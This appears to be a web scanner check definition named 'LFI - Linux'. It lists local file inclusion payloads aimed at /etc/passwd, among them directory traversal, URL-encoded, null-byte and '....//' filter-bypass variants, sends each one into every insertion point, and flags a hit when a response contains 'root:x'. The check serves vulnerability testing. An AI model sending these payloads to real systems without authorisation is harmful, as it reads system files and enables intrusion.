metadata:
		language: v1-beta
		name: "LFI - Linux"
		description: "Local File Inclusion - Linux"
		author: "MrW0l05zyn"
		tags: "lfi", "linux"

run for each:
		payloads =
				"/etc/passwd",
				"/etc/passwd%00",
				"%2Fetc%2Fpasswd",
				"%2Fetc%2Fpasswd%2500",
				"etc/passwd",
				"etc/passwd%00",
				"etc%2Fpasswd",
				"etc%2Fpasswd%2500",
				"../../../../../../../../../../etc/passwd",
				"../../../../../../../../../../etc/passwd%00",
				"%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd",
				"%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd%2500",
				"/../../../../../../../../../../etc/passwd",
				"/../../../../../../../../../../etc/passwd%00",
				"%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd",
				"%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd%2500",
				"....//....//....//....//....//....//....//....//etc/passwd",
				"....//....//....//....//....//....//....//....//etc/passwd%00",
				"%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2Fetc%2Fpasswd",
				"%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2Fetc%2Fpasswd%2500",
				"//....//....//....//....//....//....//....//....//etc/passwd",
				"//....//....//....//....//....//....//....//....//etc/passwd%00",
				"%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2Fetc%2Fpasswd",
				"%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2F%2E%2E%2E%2E%2F%2Fetc%2Fpasswd%2500"

given any insertion point then
		send payload:
				replacing: {payloads}
		
		if {latest.response} matches "root:x" then
		    report issue:
		    severity: high
		    confidence: firm
		    detail: "Local File Inclusion (LFI)"
		end if